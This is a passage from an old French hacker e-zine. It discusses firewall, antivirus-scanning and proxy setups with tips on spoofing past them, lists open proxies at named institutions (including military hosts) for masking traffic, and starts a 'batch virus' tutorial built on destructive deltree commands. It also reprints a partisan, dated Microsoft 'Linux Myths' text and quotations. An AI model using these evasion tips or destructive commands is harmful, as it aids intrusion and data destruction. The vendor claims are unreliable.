 - routeur avc une syntaxe de bas niveau (c'est pas hard a utiliser mais il faut
connaitre les peincipes de base...)
     Troisieme solution pour la securite, le firewall EN PLUS du routeur
 filtrant ... Les deux feront: du
 - filtrage sur les protocoles de communication (donc les trames louches qui
 sont regies par ces protocoles ne seront pas acceptes)  (;-(
 - filtrage sur les applications
 - filtrage sur les utilisateurs  ;-(
 - fichiers logs et statistiques d'utilisation  ;-((
 - gestion possible de reseaux complexes
    On peut aussi mettre le firewall sur le reseau interne, comme a les
 clients (comprenez que le serveur est celui qui reoit et le client qui
 arrive, comme avec Back Orifice: le programme boserve, tarnsforme votre
 machine en serveur) se font identifier par le serveur grace au firewall.
 On va pas exliquer comment marche un firewall, mais c'est simple: il reoit
 la trame, regarde si c'est bien une trame correspondant aux regles
 predefinies par les administrateurs, et ensuite transmet ou non, la trame a
 la machine cible. C'est pratique et fiable quand on a un reseau important a
 securiser... Mais a peut poser des inconvenients (Si un inconnu est sur une
 machine du reseau, et donc reconnu comme ami, il peut niquer tout le reste
 du reseau sans que le firewall agisse).Ou si le backdor utilise un port defini 
 en tant que rule et spoofe bien il peut se faire passer pour seveur...
 C'est pour a que certains firewall  ont des fonctions de demande de confirmation
 d'acceptation du paquet par la
 machine cible, mais en general desactivees parce que ca fait les fait chier de voir 
 tout le temps les memes msg pour les memes services...
    Autres trucs plus dangereux pour les hackers; certains firewalls font du
 CVP (Content Vectoring Protocol) avec les trames envoyees par n'importe qui,
 ce qui veut dire que le firewall adresse d'abord les trames a un autre
 serveur, ou a un autre routeur ou antivirus(multiple protection doc...). 
 Ben c'est la le probleme c'est  qu'en general c'est un anti-virus qui est
 le centre de readressage des  trames... ce qui veut dire que quelle que soit
 la trame, si y'a un virus  connu dedans vous etes grille et ils ont votre IP!!
 argh! Ces antivirus  fonctionnent en general a 2 en meme temps. Les plus connus
 sont Trend  Interscan VirusWall, et Norton Antivirus for Firewalls.Bref, apres 
 verification de la trame, l'antinvirus la re-envoye au firewall, 
 lui la retransmet ou non, au serveur.
    Autre forme de filtrage par CVP c'est celle du flux http, l'Hyper Text
 Transfer Protocol (toutes requetes http demandees). Voila etape par etape ce
 qui se passe:
 - Requete proxy http du client vers le proxy cache (a va du port 1023 a 80.
 80 est le port de navigation par defaut)
 - Requete http du proxy cache vers le serveur (requete interceptee par le
 firewall)
 - Requete http du firewall vers le serveur (le firewall se comporte comme un
 proxy de m....!)
 - Reponse http du serveur vers le "proxy-firewall" (qui fait proxy a ses
 heures perdues :-) )
 - Echange CVP pour analyse virale du firewall vers le(s) antivirus
 - Reponse du firewall vers le proxy cache, puis vers le premier envoyeur de
 la request, c'est a dire vous.(C'est pour ca qu'il faut le faire sur un port
 reconnu et en spoofant sur unhe adresse reconnue si possible)
    Il en faut du monde pour si peu vous allez me dire. C'est quand meme bien
 pratique pour securiser son serveur quand on essaye d'aller dans des
 sous-dossiers dont l'acces est interdit a tout etranger, ou meme au scripts
 cgi. C'est par la que tout commence pour voir si leur reseau est bien
 securise...
    Les administrateurs d'un reseau interne supportant un serveur, peuvent
 aussi remplacer le firewall par un serveur proxy... Ca marche a peu pres
 pareil, sauf que c'est plus efficace pour les requetes http (car
 transmission plus rapides, grce au cache), mais en general les
 administrateurs prennent les deux le proxy s'occupant principalement des
 requetes http (faut bien comprendre tout cela).
    CONCLUSION: la solution que tous les administrateurs devraient choisir
 mais qu'ils ne font pas forcement c'est celle ci:
 LAN prive protege par un firewall qui est connecte a un proxy anti-virus, et
 un deuxieme a un proxy cache (ceci hors connexion internet). Ce meme
 firewall (dans le continuite de la connection vers internet) est connecte a
 un routeur filtrant, puis au reste (ISP et son modem).Mais bon malgre le cache
 ca risque quand meme de les ralentir un peu et comme ils sont presses....
 Mais de toute facon pour les petites entreprises et societes il y a moins de
 risques car moins de barrages.

10.Liste de proxys
''''''''''''''''''
Si voulez faire comme dans l'article au dessus voila une petite
liste de proxys.Le principe de cette liste est le suivant:si vous la diffusez
quelquepart vous devez rajoutez des proxys.

         Code   Fournisseur           URL              port   protocole                                          
                                                                 
         AE  Emirates.Net proxy.emirates.net.ae/proxy.pac                                                          
                                                             AUTOCONFIG 
           AR 
                 Broggio
                             gopher.broggio.com.ar
                                                          80 
                                                                HTTP/FTP 
           AT 
                 Tecan
                             www-proxy.tecan.co.at
                                                          8080 
                                                                HTTP/FTP 
           AU 
                 TAS
                             www2.transport.tas.gov.au
                                                          80 
                                                                HTTP/FTP 
           AU 
                 Schools
                             proxy.schools.net.au
                                                          3128 
                                                                HTTP/FTP 
           BR 
                 CTelecom 
                             proxy.cybertelecom.com.br
                                                          8080 
                                                                HTTP/FTP 
           BR 
                 Overnet
                             vectra.overnet.com.br
                                                          3128 
                                                                HTTP/FTP 
           CA 
                 Csjlor
                             www.csjlor.qc.ca
                                                          8080 
                                                                HTTP/FTP 
           CA 
                 Clasalle 
                             acces.clasalle.qc.ca
                                                          8080 
                                                                HTTP/FTP 
           CH 
                 Cern 
                             web-cache-2.cern.ch
                                                          8080 
                                                                HTTP/FTP 
           CH 
                 UniSg
                             sigma.unisg.ch
                                                          3128 
                                                                HTTP/FTP 
           CO 
                 Compunet 
                             proxy.compunet.net.co
                                                          3128 
                                                                HTTP/FTP 
           CZ 
                 Cuni
                             hamster.ms.mff.cuni.cz
                                                          8080 
                                                                HTTP/FTP 
                                                                GOPHER / WAIS  
                                                                SECURITY 
           CZ 
                 Vutbr
                             lyn.zlin.vutbr.cz
                                                          8080 
                                                                HTTP/FTP 
           COM 
                 RR 
                             proxye1-atm.maine.rr.com
                                                          8080 
                                                                HTTP/FTP 
           COM 
                 McMail
                             proxy.mcmail.com
                                                          8080 
                                                                HTTP/FTP 
           COM 
                 Ludexpress
                             yogsothoth.ludexpress.com
                                                          8080 
                                                                HTTP/FTP 
           DE 
                 HtwkL 
                             zeus.rz.htwk-leipzig.de
                                                          80 
                                                                HTTP/FTP 
                                                                GOPHER 
           DE 
                 Siemens
                             ramses.erlm.siemens.de
                                                          80 
                                                                HTTP/FTP 
           DE 
                 U-Rb. 
                             rrznw6.rz.uni-regensburg.de
                                                          8080 
                                                                HTTP/FTP 
           EDU 
                 Berkeley
                             smorgasbord.ICSI.Berkeley.EDU
                                                          8080 
                                                                HTTP/FTP 
           EDU 
                 PurdueNC
                             Brahma.CC.PurdueNC.Edu
                                                          8080 
                                                                HTTP/FTP 
           FI 
                 Inet
                             proxy.inet.fi
                                                          800 
                                                                HTTP/FTP 
           FI 
                 TPU
                             proxy.cs.tpu.fi
                                                          80 
                                                                HTTP/FTP 
           FR 
                 AC
                             ppar.ac-bordeaux.fr
                                                          8080 
                                                                HTTP/FTP 
           GOV 
                 Dgs
                             wall-14.dgs.ca.gov
                                                          80 
                                                                HTTP/FTP 
           IT 
                 TO 
                             www.focos.to.it
                                                          3128 
                                                                HTTP/FTP 
           IT 
                 Lcnet
                             mail.lcnet.it
                                                          8080 
                                                                HTTP/FTP 
           JP 
                 K-K 
                             lip.kobe-kosen.ac.jp
                                                          8080 
                                                                HTTP/FTP 
           JP 
                 Fukuoka
                             kusu.city.kurume.fukuoka.jp
                                                          8080 
                                                                HTTP/FTP 
           KR 
                 Kyunghee
                             cvs2.kyunghee.ac.kr
                                                          8080 
                                                                HTTP/FTP 
           KR 
                 Taegu
                             biho.taegu.ac.kr
                                                          8080 
                                                                HTTP/FTP 
           MIL 
                 Dla
                             cani.dla.mil
                                                          8080 
                                                                HTTP/FTP 
           MIL 
                 OSD
                             pgwcm.otd.osd.mil
                                                          80 
                                                                HTTP/FTP 
           MIL 
                 Navy
                             gatekeeper.jag.navy.mil
                                                          80 
                                                                HTTP/FTP 
           MIL 
                 USMC
                             gate1.yuma.usmc.mil
                                                          80 
                                                                HTTP/FTP 
           NET 
                 Deltacom
                             cacheflow1.deltacom.net
                                                          8080 
                                                                HTTP/FTP 
           NET 
                 Coqui
                             proxy.coqui.net
                                                          80 
                                                                HTTP/FTP 
           NL 
                 Nhtv
                             proxy.nhtv.nl
                                                          8080 
                                                                HTTP/FTP 
           NL 
                 Tebenet
                             www.tebenet.nl
                                                          8080 
                                                                HTTP/FTP 
           ORG 
                 Londonderry
                             www.londonderry.org
                                                          8080 
                                                                HTTP/FTP 
           ORG 
                 Aclin
                             aclin.org
                                                          8080 
                                                                HTTP/FTP 
           PH 
                 EMC
                             ascaris.emc.com.ph
                                                          8888 
                                                                HTTP/FTP 
           PH 
                 Info
                             mail2.info.com.ph
                                                          3128 
                                                                HTTP/FTP 
           PT 
                 Isec
                             leonardo.isec.pt
                                                          8080 
                                                                HTTP/FTP 
           PT 
                 Teleweb
                             caclis01.teleweb.pt
                                                          3128 
                                                                HTTP/FTP 
           PY 
                 Infonet
                             ns1.infonet.com.py
                                                          8080 
                                                                HTTP/FTP 
           QA 
                 Qatarnet
                             proxy.qatar.net.qa
                                                          8080 
                                                                HTTP/FTP 
           SE 
                 Varnamo
                             ns.varnamo.se
                                                          8080 
                                                                HTTP/FTP 
           TR 
                 Turnet
                             proxy1.turnet.net.tr
                                                          8080 
                                                                HTTP 
           TR 
                 Turnet
                             proxy2.turnet.net.tr
                                                          8080 
                                                                HTTP 
           TW 
                 IS
                             c1.h202052106.is.net.tw
                                                          80 
                                                                HTTP/FTP 
           TW 
                 Golden
                             club.golden.com.tw
                                                          8080 
                                                                HTTP/FTP 
           UK 
                 Ondemand
                             cache1.ondemand.co.uk
                                                          8080 
                                                                HTTP/FTP 
           UK 
                 LUT
                             double-panic.lut.ac.uk
                                                          8080 
                                                                HTTP/FTP 
           US 
                 K12
                             stpauls.pvt.k12.al.us
                                                          8080 
                                                                HTTP/FTP 
           US 
                 Oh 
                             websense.gcpl.lib.oh.us
                                                          8080 
                                                                HTTP/FTP 
           ZA 
                 New
                             cache.new.co.za
                                                          8080 
                                                                HTTP/FTP 
           ZA 
                 Global
                             cache02.global.co.za
                                                          3128 
                                                                HTTP/FTP 
           ZW 
                 Cybergate
                             proxy.cybergate.co.zw
                                                          8080 
                                                                HTTP/FTP 
           ZW 
                 Africaonline 
                             proxy.africaonline.co.zw
                                                          8080 
                                                                HTTP/FTP 
           BE
		     Infonie
				   proxy.infonie.be
							80   HTTP/FTP
Il faut lire le tableau en diagonale(j'ai ete oblige de faire ca)

11.Comment faire un virus en .bat ??

Il faut d'abord connaitre quelques commandes utilisees dans
ce tutorial :
 
 deltree x:\tralalala\*.*
supprime tous les fichiers du repertoire tralalala sur le disque
X qui on comme nom *(tous) et comme extension*(tous)
par exemple pour supprimer le fichier autoexec.bat on met
deltree C:\autoexec.bat
 
 echo ce que vous voulez
fait apparaitre a l'ecran la phrase ce que vous voulez
 Pause
stoppe lecran a l'endroit ou vous place cette commande.
La phrase "appuyez sur une touche pour continuer..."apparait.
 
 choice /c:12Q /t:Q /n Votre choix?
 if errorlevel 255 goto fin
 if errorlevel 3 goto Quit
 if errorlevel 2 goto Section2
 if errorlevel 1 goto Section1
en clair la 1ere ligne de cette commande pose une question
a l'utilisateur,les reponses possibles sont 1,2 ou Q.
Le parametre /t: indique la derniere reponse possible.
/n indique la question
if errorlevel indique la section ou il faut aller selon le
reponse(ex:si on met 2 ca va a Section2)
le nombre a cote de errorlevel correspond au parametre /c:
(donc Q vaut 3 puisque c'est le troisieme)

 cls
cette commande efface tout ce qu'il y a a l'ecran.

Les sections
Un programme en bat peut etre divise en sections:
pour definir une section il faut introduire la commande
:NomDeLaSection
puis toutes les commandes que vous voulez puis un goto pour
quitter ou pour revenir au depart.
Si il n'y a pas de goto ou de Pause a la fin de la section,
le programme se ferme automatiquement.

Bon ca c'etait pour la theorie.
Pour la pratique je mettrai quelques exemples dans BHZ Mag n3.


11 Linux Myths(by Microsoft)

Un exemple de ce que ces connards de chez Kro$oft arrivent a pondre.
C'est incroyable de voir a quel point ils sont hypocrites...
Jugez par vous meme..:
With all the recent attention around Linux as an operating system, it's important to step back from the hype and look at
the reality. First, it's worth noting that Linux is a UNIX-like operating system. Linux fundamentally relies on 30-year-old
operating system technology and architecture. Linux was not designed from the ground-up to support symmetrical
multiprocessing (SMP), graphical user interfaces (GUI), asynchronous I/O, fine-grained security model, and many other
important characteristics of a modern operating system. These architectural limitations mean that as customers look for a
platform to cost effectively deploy scalable, secure, and robust applications, Linux simply cannot deliver on the hype.

Myth: Linux performs better than Windows NT 

Reality: Windows NT 4.0 Outperforms Linux On Common Customer Workloads

The Linux community claims to have improved performance and scalability in the latest versions of the Linux Kernel (2.2),
however it's clear that Linux remains inferior to the Windows NT 4.0 operating system. 

       For File and Print services, according to independent tests conducted by PC Week Labs, the Windows NT 4.0
       operating system delivers 52 percent better performance on a single processor system and 110 percent better
       performance on a 4-way system than similarly configured single processor and 4-way Linux/SAMBA systems. 
       For Web servers, the same PC Week tests showed Windows NT 4.0 with Internet Information Server 4.0
       delivers 41 percent better performance on a single processor system and 125 percent better performance on a
       4-way system than Linux and Apache. 
       For e-commerce workloads using secure sockets (SSL), recent PC Magazine tests showed Windows NT 4.0 with
       Internet Information Server 4.0 delivers approximately five times the performance provided by Linux and
       Stronghold. 
       For transaction-orientated Line of Business applications, Windows NT 4.0 has achieved a result of 40,368 tpmC
       at a cost of $18.46 per transaction on a Compaq 8-Way Pentium III XEON processor-based system. This
       industry leading price/performance result from the Transaction Processing Performance Council (TPC) clearly
       shows how Windows NT can deliver world-class performance for heavy duty transaction processing. It's
       interesting to note that there is not a single TPC result on any database running on Linux, and therefore Linux
       has yet to demonstrate their capabilities as a database server. 
       Linux performance and scalability is architecturally limited in the 2.2 Kernel. Linux only supports 2 gigabytes (GB)
       of RAM on the x86 architecture,1 compared to 4 GB for Windows NT 4.0. The largest file size Linux supports is 2
       GB versus 16 terabytes (TB) for Windows NT 4.0. The Linux SWAP file is limited to 128 MB. In addition, Linux
       does not support many of the modern operating system features that Windows NT 4.0 has pioneered such as
       asynchronous I/O, completion ports, and fine-grained kernel locks. These architecture constraints limit the ability
       of Linux to scale well past two processors. 
       The Linux community continues to promise major SMP and performance improvements. They have been
       promising these since the development of the 2.0 Kernel in 1996. Delivering a scalable system is a complex task
       and it's not clear that the Linux community can solve these issues easily or quickly. As D. H. Brown Associates
       noted in a recent technical report,2 the Linux 2.2 Kernel remains in the early stages of providing a tuned SMP
       kernel. 

Myth: Linux is more reliable than Windows NT 

Reality: Linux Needs Real World Proof Points Rather than Anecdotal Stories

The Linux community likes to talk about Linux as a stable and reliable operating system, yet there are no real world data
or metrics and very limited customer evidence to back up these claims. 

       Windows NT 4.0 has been proven in demanding customer environments to be a reliable operating system.
       Customers such as Barnes and Noble, The Boeing Company, Chicago Stock Exchange, Dell Computer, Nasdaq
       and many others run mission-critical applications on Windows NT 4.0. 
       Linux lacks a commercial quality Journaling File System. This means that in the event of a system failure (such as
       a power outage) data loss or corruption is possible. In any event, the system must check the integrity of the file
       system during system restart, a process that will likely consume an extended amount of time, especially on large
       volumes and may require manual intervention to reconstruct the file system. 
       There are no commercially proven clustering technologies to provide High Availability for Linux. The Linux
       community may point to numerous projects and small companies that are aiming to deliver High Availability
       functionality. D. H. Brown recently noted that these offerings remain immature and largely unproven in the
       demanding business world. 
       There are no OEMs that provide uptime guarantees for Linux, unlike Windows NT where Compaq, Data General,
       Hewlett-Packard, IBM, and Unisys provide 99.9 percent system-level uptime guarantees for Windows NT-based
       servers. 

Myth: Linux is Free 

Reality: Free Operating System Does Not Mean Low Total Cost of Ownership

The Linux community will talk about the free or low-cost nature of Linux. It's important to understand that licensing cost
is only a small part of the overall decision-making process for customers.

       The cost of the operating system is only a small percentage of the overall total cost of ownership (TCO). In
       general Windows NT has proven to have a lower cost of ownership than UNIX. Previous studies have shown
       that Windows NT has 37 percent lower TCO than UNIX. There is no reason to believe that Linux is significantly
       different than other versions of UNIX when it comes to TCO. 
       The very definition of Linux as an Open Software effort means that commercial companies like Red Hat will make
       money by charging for services. Therefore, commercial support services for Linux will be fee-based and will likely
       be priced at a premium. These costs have to be factored into the total cost model. 
       Linux is a UNIX-like operating system and is therefore complex to configure and manage. Existing UNIX users
       may find the transition to Linux easier but administrators for existing Windows-based or Novell environments
       will find it more difficult to handle the complexity of Linux. This retraining will add significant costs to Linux
       deployments. 
       Linux is a higher risk option than Windows NT. For example how many certified engineers are there for Linux?
       How easy is it to find skilled development and support people for Linux? Who performs end-to-end testing for
       Linux-based solutions? These factors and more need to be taken into account when choosing a platform for
       your business. 

Myth: Linux is more secure than Windows NT 

Reality: Linux Security Model Is Weak

All systems are vulnerable to security issues, however it's important to note that Linux uses the same security model as
the original UNIX implementations--a model that was not designed from the ground up to be secure. 

       Linux only provides access controls for files and directories. In contrast, every object in Windows NT, from files to
       operating system data structures, has an access control list and its use can be regulated as appropriate. 
       Linux security is all-or-nothing. Administrators cannot delegate administrative privileges: a user who needs any
       administrative capability must be made a full administrator, which compromises best security practices. In
       contrast, Windows NT allows an administrator to delegate privileges at an exceptionally fine-grained level. 
       Linux has not supported key security accreditation standards. Every member of the Windows NT family since
       Windows NT 3.5 has been evaluated at either a C2 level under the U.S. Government's evaluation process or at a
       C2-equivalent level under the British Government's ITSEC process. In contrast, no Linux products are listed on
       the U.S. Government's evaluated product list. 
       Linux system administrators must spend huge amounts of time understanding the latest Linux bugs and
       determining what to do about them. This is made complex due to the fact that there isn't a central location for
       security issues to be reported and fixed. In contrast Microsoft provides a single security repository for
       notification and fixes of security related issues. 
       Configuring Linux security requires an administrator to be an expert in the intricacies of the operating system
       and how components interact. Misconfigure any part of the operating system and the system could be
       vulnerable to attack. Windows NT security is easy to set up and administer with tools such as the Security
       Configuration Editor. 

Myth: Linux can replace Windows on the desktop

Reality: Linux Makes No Sense at the Desktop 

Linux as a desktop operating system makes no sense. A user would end up with a system that has fewer applications, is
more complex to use and manage, and is less intuitive. 

       Linux does not provide support for the broad range of hardware in use today; Windows NT 4.0 currently
       supports over 39,000 systems and devices on the Hardware Compatibility List. Linux does not support
       important ease-of-use technologies such as Plug and Play, USB, and Power Management 
       The complexity of the Linux operating system and cumbersome nature of the existing GUIs would make
       retraining end-users a huge undertaking and would add significant cost 
       Linux application support is very limited, meaning that customers end up having to build their own horizontal
       and vertical applications. A recent report from Forrester Research highlighted the fact that today 93 percent of
       enterprise ISVs develop applications for Windows NT, while only 13 percent develop for Linux.3 

Summary
The Linux operating system is not suitable for mainstream usage by business or home users. Today with Windows NT
4.0, customers can be confident in delivering applications that are scalable, secure, and reliable--yet cost effective to
deploy and manage. Linux clearly has a long way to go to be competitive with Windows NT 4.0. With the release of the
Windows 2000 operating system, Microsoft extends the technical superiority of the platform even further ensuring that
customers can deliver the next generation applications to solve their business challenges. 

``````````````````````````````````````````````````````````````````````````````````````````````
Et VoilA c'est deja fini!
Si vous vous dites  qu'avec le peu de choses qu'il y a dans
ce zine j'aurais pu le sortir plutot je vous emmerde.C'est facile
de critiquer quand on ne fait que lire ce que les autres ecrivent
N'est ce pas Hoper et Seb R.?

Et pour finir quelques citations...

"Sauvez les lamers,formatez leur disque"
#GoY#

"It's nice to be important, il's more important to be nice. 
Hack the best,Fuck the rest"
#Leonard(Madchat)#

"Putain,j'en ai rien a foutre de ce zine a la con"
#Flat Eric#

"Nunc est bibendum"
#Asmodeus#

"Consommer de la cafeine de facon abusive  peut vous faire devenir l33T" 
#PsYkAoS#

l'exprience est comme une lanterne accroch dans le dos de quelqu'un 
elle n'claire que le pass ;)
#GENOCYD#

"Un jour la France sera dmocratique. On peut toujours
rver..."
#peace&love#
                                 
"La chance accorde ses faveurs aux esprits avertis"
#Brain.Override#

"Mort aux cons"
#Hagen#
--------------------------------------------------------------------------------------

 